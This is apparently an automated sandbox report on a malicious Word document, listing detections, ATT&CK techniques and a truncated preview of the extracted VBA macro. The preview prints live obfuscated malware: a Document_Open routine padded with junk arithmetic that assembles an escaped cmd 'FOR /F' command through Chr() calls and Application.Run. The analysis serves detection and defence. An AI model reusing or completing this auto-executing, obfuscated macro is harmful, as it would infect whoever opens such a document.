MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains a VBA macro that automatically executes upon opening the document, as indicated by the Document_Open and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics. The critical OLE_VBA_SHELL heuristic confirms the use of the Shell() function, which is commonly used to download and execute additional malicious content. The ClamAV detection name 'Doc.Malware.Valyria-6699348-0' further supports its malicious nature. No specific family could be identified.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6699348-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6699348-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32471 bytes |
SHA-256: a643a80903f7ca2394b917ffefeb03decb6e82d43f3eb7e4d330c90907780e6d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jHpzUjBSRc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zCvwahASJXiK()
GWRQv = (26065 / VcHoc)
VmEEN = (77621 / CoPqFh)
oPYXdh = (20836 / ocFPA)
zUHvt = (32657 / tnBTB)
hNRwdb = (63560 / BdtbMs)
KfMtSd = (74514 / jkXdWk)
End Function
Private Sub Document_open()
On Error Resume Next
mhqlXG = FIkNQU / ZdWQj / 9123 - VZwBH + qCjvVX + 21095 + (FWCdNn * pXFQBd + zwhwEm / HtkPc)
DzJcu = maWZls / iAYkj / 28041 - TcNNv + NJTsfs + 89625 + (YSEIqs * HrzGNq + cWsGR / lbmvj)
viKjoj = 14236 + 18842 - 39152 + zUErkk / qkwtqR - jBNTL * 90668 * zrKNvJ - jtArqW + uiTmaw * (KwsFQu * nSowZw + duiob + HqzBz)
cGdtsz = 60935 + 11324 - 65622 + bqVkM / PHhFAj - zZbZFz * 62529 * brGBA - EOPKG + BRPvkZ * (Wozslw * dTRYZ + BLzwP + LXLtSv)
rYArFNGOuED = Application.Run("CwuuNBI", "" + ossJXUGTmV + fCqkFAJE + CVar("c") + WTYfzcSOk + QiNXsFNqdudnf + BYGnRVMu + YikODKscjCi + jiLmmf + hRvHE + KpbMjw + jtLZXzE + mjjCm + kjWwU + EpKuRON + XhAUr + AivvHLcihtm + hcGjZORPC + zvhNCWB + wjcdlPv + nQuqv + WujkwEmvSIfP + bMtRazRkpzzkUT)
FVcORY = 15315 + 26604 - 50832 + PhcVJM / LPkHhU - UmEil * 27490 * SwaCJm - iCEfr + hkIUon * (JEOjX * JuiUZ + MHzkBS + ZEjMfc)
wwNzQ = 57585 + 92523 - 25483 + iVDUZd / YuIiM - bpvqJ * 64585 * ABnPBo - UIUVBJ + Bcrmt * (wcdPM * tVYCaU + hijhn + kCjPa)
mkikuz = 8951 + 51687 - 27016 + qfJdcz / fCfbkz - BoNFc * 83629 * HhOWKA - iiHjjC + nqwbj * (AZLKCk * iGkzw + zjwvG + zwAXX)
End Sub
Function mZMDEQM()
FdaNZ = 39516 + 50284 - 90594 + EvcjmQ / jLwTz - VXOlbH * 20569 * bnTPz - UcLKJa + nvzikn * (zJMfa * HDwot + kWdHI + nliGA)
YYDNv = 10935 + 91694 - 13239 + AnbjUu / SISPM - cjkHv * 24397 * WECwKI - kFpwl + jmsbD * (RzlHt * LUwXc + KiIXvk + YMlTMS)
WrjzDT = 17132 + 48165 - 78403 + nMDlI / IJVZr - spHjj * 32168 * ZzPNOq - wLWiF + XiwinD * (XBHwpw * zrrUjs + OZYwpv + GwnqT)
ZTGZF = 6789 + 32221 - 51873 + LQABnj / diFvW - zWIDb * 85463 * KESna - zqWSRa + pwmQwi * (owMiQ * OWjRCb + CXGzM + LmaGMo)
Kqdvj = 34749 + 14502 - 47178 + RYQtHH / BuNwI - ajwHz * 31219 * UHVzu - AOZDam + iGZYCt * (dmwFzt * QzwYU + UXJCQw + HFbrn)
WwksGz = 40327 + 69086 - 22808 + kXiNbH / QpCqR - oDWSlN * 84617 * tvTrX - YvdDSL + NpwzL * (BvwSm * Hvpkf + VTsqbL + DIjUL)
EWpnJE = 82196 + 90679 - 97042 + wJfwnN / dBmCz - qIzis * 62412 * YpXoHw - kTjTn + mzbwa * (XGjQj * ENwfLa + OSMHmq + oGcJRT)
End Function
Attribute VB_Name = "OicPGrTFWR"
Function BYGnRVMu()
On Error Resume Next
KYAiz = LYROEK / 26514 / 94534 * ZznwGl / RuErc - SzZaF * 85706 - kBjQU + (25754 / 13826 / 41040 / wojAr)
fwooz = 14630 / iGOFG - 33419 / iFVXNY + 37185 * dtisz * QHbOab + 87624
IPqsWikvm = CStr(Chr(EzCGaZiHp + pAjuiQGrS + 109 + VdswjJGPHNQlzw + mbaYIdGYaqMMs)) + "d /" + CStr(Chr(vQHdYNcsYBawCZ + zqcUQsaosXUX + 99 + uWuRUUpSTaJiBX + EwKIOWQtfCpT)) + " FOR " + " ; /F" + " ;" + " " + CStr(Chr(sECbHEC + vsfWBKh + 34 + FLTWNhi + AlSiWhR)) + " "
IjQrdj = 13034 / HXSLvR - 43819 / SqbBB + 41774 * ZkOmu * qSjoI + 26397
ccvCK = 13185 / ADiSi - 28272 / iSEIVu + 19136 * KINzm * fpwCoR + 91317
QMWldo = 36779 / hswkIX - 71029 / WuXSn + 78593 * UQVOi * uzhtp + 76788
TcvwSwP = "deli" + CStr(Chr(faQiiTt + jzPiwMmNa + 109 + rVsiwBzmQW + TFBQnbj)) + "s=fQ" + "G to" + "kens" + "= 1 " + CStr(Chr(wRzYqRnGsIH + NKhhfdTG + 34 + luwdzvwmuiutEt + jMjXNqWI)) + " " + "," + " " + "%^C" + " ,"
JIEjJw = 92563 / UdaJb - 98806 / uznYq + 11917 * tLXQE * WmDIRq + 62252
VMJdNu = 18688 / HPTXu - 21459 / pQVvPs + 18133 * tNAhZR * kTszba + 27460
CbkwujIwz = " ; IN" + " , " + " ; ( " + "," + " ' ; ;" + " ^^FT^" + "^y^"
nDXOS = 78931 / TtdHz - 36236 / KtUXTt + 26398 * GuWYR * zdpjrC + 22248
jrPBl = 22762 / bdTAVk - 7080 / LUQQN + 23180 * CPiAiz * AbDcbf + 750
IBYGww = 83168 / ipsPG - 95840 / fIzpAX + 71265 * isdszs * XEScI + 29770
sfiSka = "^Pe" + " " + "; ^| " + "
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.